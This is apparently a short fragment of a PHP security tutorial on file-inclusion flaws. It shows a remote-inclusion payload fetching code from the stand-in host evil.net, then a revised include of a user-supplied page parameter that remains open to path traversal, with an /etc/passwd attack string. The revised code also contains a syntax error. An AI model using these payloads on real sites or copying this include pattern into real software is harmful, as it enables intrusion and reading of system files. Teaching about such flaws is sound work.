Variable Poisoning :: Chapter 2
Variable Poisoning :: Chapter 2
[Past Exploits]
./?page=ftp://user:pass@evil.net/arbitrary_code.php
New Code
// php.ini ::
allow_url_fopen = Off
$
path
=
'/path/to/pages/'
;
if
(
file_exists
(
$
path
.
$
_GET
[
'page'
]
;
)
)
{
include
$
path
.
$
_GET
[
'page'
]
;
}
Attack:
./?page=../../../../../../../etc/passwd
